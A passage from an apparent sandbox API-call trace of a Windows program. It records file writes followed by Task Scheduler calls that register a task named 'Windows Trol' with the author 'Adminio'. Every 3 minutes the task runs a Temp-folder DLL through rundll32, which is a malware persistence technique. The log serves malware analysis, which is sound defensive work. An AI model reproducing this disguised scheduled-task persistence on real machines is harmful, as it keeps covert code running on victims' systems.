lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.105] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.106] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.106] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.106] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.107] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.107] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.107] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.107] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.108] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.108] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.108] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.109] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.109] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.109] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.121] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.121] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.122] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.122] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.122] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.123] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.123] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.123] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.124] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.124] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.124] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.125] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.125] GetLastError () returned 0x0 [0119.125] SetLastError (dwErrCode=0x0) [0119.125] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x801, lpNumberOfBytesWritten=0x6f51f4, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f51f4*=0x801, lpOverlapped=0x0) returned 1 [0119.126] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc95b838 | out: hHeap=0x7e0000) returned 1 [0119.126] CloseHandle (hObject=0xcb0) returned 1 [0119.135] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4b08 [0119.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rdwmnjioffws", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rdwmnjioffws", cchWideChar=12, lpMultiByteStr=0x6f6d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rdwmnjioffws", lpUsedDefaultChar=0x0) returned 12 [0119.135] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x40) returned 0x102630a8 [0119.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x10263060 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x5f) returned 0xca3ab20 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102630a8 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1) returned 0xc91bd30 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bd90 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd30 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x3) returned 0xc91bc60 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd90 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bd90 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc60 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bdc0 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd90 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x9) returned 0xca25528 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bdc0 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xd) returned 0xca255a0 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25528 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x13) returned 0xc792a70 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca255a0 | out: hHeap=0x7e0000) returned 1 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x10) returned 0xca25750 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4978 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4978 | out: hHeap=0x7e0000) returned 1 [0119.136] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc792a70 | out: hHeap=0x7e0000) returned 1 [0119.136] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6f6f28, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0119.136] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4978 [0119.136] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6f6f28, cbMultiByte=12, lpWideCharStr=0xc6e4978, cchWideChar=12 | out: lpWideCharStr="Windows Trol") returned 12 [0119.137] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x50) returned 0xca662c8 [0119.137] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x80010106 [0119.137] CoCreateInstance (in: rclsid=0x69113d84*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x69113d74*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x6f6a68 | out: ppv=0x6f6a68*=0x8d15370) returned 0x0 [0119.422] TaskScheduler:ITaskService:Connect (This=0x8d15370, serverName=0x6f696c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x6f697c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x6f698c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x6f699c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0119.430] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca257b0 [0119.430] TaskScheduler:ITaskService:GetFolder (in: This=0x8d15370, Path="\\", ppFolder=0x6f6a78 | out: ppFolder=0x6f6a78*=0x8ca63d8) returned 0x0 [0119.432] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca257b0 | out: hHeap=0x7e0000) returned 1 [0119.432] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca25780 [0119.432] ITaskFolder:DeleteTask (This=0x8ca63d8, Name="Windows Trol", flags=0) returned 0x80070002 [0119.433] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25780 | out: hHeap=0x7e0000) returned 1 [0119.433] TaskScheduler:ITaskService:NewTask (in: This=0x8d15370, flags=0x0, ppDefinition=0x6f6a7c | out: ppDefinition=0x6f6a7c*=0x8ca61a8) returned 0x0 [0119.434] TaskScheduler:IUnknown:Release (This=0x8d15370) returned 0x1 [0119.434] ITaskDefinition:get_RegistrationInfo (in: This=0x8ca61a8, ppRegistrationInfo=0x6f6a54 | out: ppRegistrationInfo=0x6f6a54*=0x8ca77f8) returned 0x0 [0119.434] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca25678 [0119.434] IRegistrationInfo:put_Author (This=0x8ca77f8, Author="Adminio") returned 0x0 [0119.434] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25678 | out: hHeap=0x7e0000) returned 1 [0119.434] IUnknown:Release (This=0x8ca77f8) returned 0x1 [0119.435] ITaskDefinition:get_Principal (in: This=0x8ca61a8, ppPrincipal=0x6f6a64 | out: ppPrincipal=0x6f6a64*=0x8ca87c8) returned 0x0 [0119.435] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca256f0 [0119.435] IPrincipal:put_Id (This=0x8ca87c8, Id="Principal") returned 0x0 [0119.435] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca256f0 | out: hHeap=0x7e0000) returned 1 [0119.435] IPrincipal:put_LogonType (This=0x8ca87c8, LogonType=3) returned 0x0 [0119.435] IPrincipal:put_RunLevel (This=0x8ca87c8, RunLevel=0) returned 0x0 [0119.435] IUnknown:Release (This=0x8ca87c8) returned 0x1 [0119.435] ITaskDefinition:get_Settings (in: This=0x8ca61a8, ppSettings=0x6f6a74 | out: ppSettings=0x6f6a74*=0x8ca86d8) returned 0x0 [0119.435] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca255b8 [0119.436] ITaskSettings:put_ExecutionTimeLimit (This=0x8ca86d8, ExecutionTimeLimit="PT0S") returned 0x0 [0119.436] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca255b8 | out: hHeap=0x7e0000) returned 1 [0119.436] ITaskSettings:put_DisallowStartIfOnBatteries (This=0x8ca86d8, DisallowStartIfOnBatteries=0) returned 0x0 [0119.436] ITaskSettings:put_StopIfGoingOnBatteries (This=0x8ca86d8, StopIfGoingOnBatteries=0) returned 0x0 [0119.436] IUnknown:Release (This=0x8ca86d8) returned 0x3 [0119.436] ITaskDefinition:get_Triggers (in: This=0x8ca61a8, ppTriggers=0x6f6a4c | out: ppTriggers=0x6f6a4c*=0x8cef6b8) returned 0x0 [0119.436] ITriggerCollection:Create (in: This=0x8cef6b8, Type=1, ppTrigger=0x6f6a50 | out: ppTrigger=0x6f6a50*=0x8ca6568) returned 0x0 [0119.437] IUnknown:Release (This=0x8cef6b8) returned 0x1 [0119.437] IUnknown:QueryInterface (in: This=0x8ca6568, riid=0x69113d94*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x6f6a70 | out: ppvObject=0x6f6a70*=0x8ca6568) returned 0x0 [0119.437] IUnknown:Release (This=0x8ca6568) returned 0x2 [0119.437] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca25780 [0119.437] ITrigger:put_Id (This=0x8ca6568, Id="Trigger") returned 0x0 [0119.437] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25780 | out: hHeap=0x7e0000) returned 1 [0119.437] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f6998 | out: lpSystemTimeAsFileTime=0x6f6998*(dwLowDateTime=0x95905c75, dwHighDateTime=0x1d8af44)) [0119.437] GetLastError () returned 0x0 [0119.437] SetLastError (dwErrCode=0x0) [0119.437] GetLastError () returned 0x0 [0119.437] SetLastError (dwErrCode=0x0) [0119.438] GetLastError () returned 0x0 [0119.438] SetLastError (dwErrCode=0x0) [0119.438] GetTimeZoneInformation (in: lpTimeZoneInformation=0x6911c590 | out: lpTimeZoneInformation=0x6911c590) returned 0x2 [0119.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x6911ae28, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x6f6914 | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x6f6914) returned 24 [0119.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x6911ae68, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x6f6914 | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x6f6914) returned 24 [0119.438] GetLastError () returned 0x0 [0119.438] SetLastError (dwErrCode=0x0) [0119.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x69114a50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0119.438] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x18) returned 0xc794290 [0119.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x69114a50, cbMultiByte=-1, lpWideCharStr=0xc794290, cchWideChar=12 | out: lpWideCharStr="%Y-%m-%dT%X") returned 12 [0119.438] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xa0) returned 0xc918b80 [0119.438] GetLastError () returned 0x0 [0119.438] SetLastError (dwErrCode=0x0) [0119.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2021-08-13T20:43:30", cchWideChar=-1, lpMultiByteStr=0x6f6d14, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2021-08-13T20:43:30", lpUsedDefaultChar=0x0) returned 20 [0119.439] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc918b80 | out: hHeap=0x7e0000) returned 1 [0119.439] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc794290 | out: hHeap=0x7e0000) returned 1 [0119.439] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca255b8 [0119.439] lstrlenA (lpString="2021-08-13T20:43:30") returned 19 [0119.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6f6d14, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0119.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6f6d14, cbMultiByte=20, lpWideCharStr=0x6f6910, cchWideChar=20 | out: lpWideCharStr="2021-08-13T20:43:30") returned 20 [0119.439] ITrigger:put_StartBoundary (This=0x8ca6568, StartBoundary="2021-08-13T20:43:30") returned 0x0 [0119.439] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca255b8 | out: hHeap=0x7e0000) returned 1 [0119.439] ITrigger:get_Repetition (in: This=0x8ca6568, ppRepeat=0x6f6a6c | out: ppRepeat=0x6f6a6c*=0x8ce53c8) returned 0x0 [0119.439] IUnknown:Release (This=0x8ca6568) returned 0x1 [0119.439] IRepetitionPattern:put_Duration (This=0x8ce53c8, Duration=0x0) returned 0x0 [0119.439] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca25528 [0119.439] IRepetitionPattern:put_Interval (This=0x8ce53c8, Interval="PT3M") returned 0x0 [0119.439] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25528 | out: hHeap=0x7e0000) returned 1 [0119.440] IUnknown:Release (This=0x8ce53c8) returned 0x1 [0119.440] ITaskDefinition:get_Actions (in: This=0x8ca61a8, ppActions=0x6f6a5c | out: ppActions=0x6f6a5c*=0x8d3dde8) returned 0x0 [0119.440] IActionCollection:Create (in: This=0x8d3dde8, Type=0, ppAction=0x6f6a58 | out: ppAction=0x6f6a58*=0x8cef078) returned 0x0 [0119.440] IUnknown:Release (This=0x8d3dde8) returned 0x1 [0119.440] IUnknown:QueryInterface (in: This=0x8cef078, riid=0x69113da4*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x6f6a60 | out: ppvObject=0x6f6a60*=0x8cef078) returned 0x0 [0119.440] IUnknown:Release (This=0x8cef078) returned 0x2 [0119.440] GetWindowsDirectoryW (in: lpBuffer=0x6f6b0c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4b30 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1) returned 0xc91bc60 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bd30 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc60 | out: hHeap=0x7e0000) returned 1 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x3) returned 0xc91bc60 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd30 | out: hHeap=0x7e0000) returned 1 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bc80 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc60 | out: hHeap=0x7e0000) returned 1 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bdc0 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc80 | out: hHeap=0x7e0000) returned 1 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x9) returned 0xca25678 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bdc0 | out: hHeap=0x7e0000) returned 1 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xd) returned 0xca25690 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25678 | out: hHeap=0x7e0000) returned 1 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x13) returned 0xc794530 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25690 | out: hHeap=0x7e0000) returned 1 [0119.440] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1c) returned 0xc6e4bf8 [0119.440] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc794530 | out: hHeap=0x7e0000) returned 1 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2a) returned 0xc9b0140 [0119.441] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4bf8 | out: hHeap=0x7e0000) returned 1 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4950 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9b0418 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4ae0 [0119.441] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9b0418 | out: hHeap=0x7e0000) returned 1 [0119.441] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9b0140 | out: hHeap=0x7e0000) returned 1 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9b0140 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca25678 [0119.441] lstrlenA (lpString="C:\\Windows\\system32\\rundll32.exe") returned 32 [0119.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc9b0140, cbMultiByte=33, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0119.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc9b0140, cbMultiByte=33, lpWideCharStr=0x6f68f0, cchWideChar=33 | out: lpWideCharStr="C:\\Windows\\system32\\rundll32.exe") returned 33 [0119.441] IExecAction:put_Path (This=0x8cef078, Path="C:\\Windows\\system32\\rundll32.exe") returned 0x0 [0119.441] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25678 | out: hHeap=0x7e0000) returned 1 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x90) returned 0xca34350 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca255a0 [0119.441] IExecAction:put_Arguments (This=0x8cef078, Arguments="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dnrdfsi11023.dll\",Rdwmnjioffws") returned 0x0 [0119.441] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca255a0 | out: hHeap=0x7e0000) returned 1 [0119.441] IUnknown:Release (This=0x8cef078) returned 0x1 [0119.441] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xc) returned 0xca25780 [0119.442] ITaskFolder:RegisterTaskDefinition (in: This=0x8ca63d8, Path="Windows Trol", pDefinition=0x8ca61a8, flags=6, UserId=0x6f6974*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x6f6984*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0x6f6998*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), ppTask=0x6f6a48 | out: ppTask=0x6f6a48*=0x8ca7398) returned 0x0 [0122.133] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25780 | out: hHeap=0x7e0000) returned 1 [0122.133] TaskScheduler:IUnknown:Release (This=0x8ca63d8) 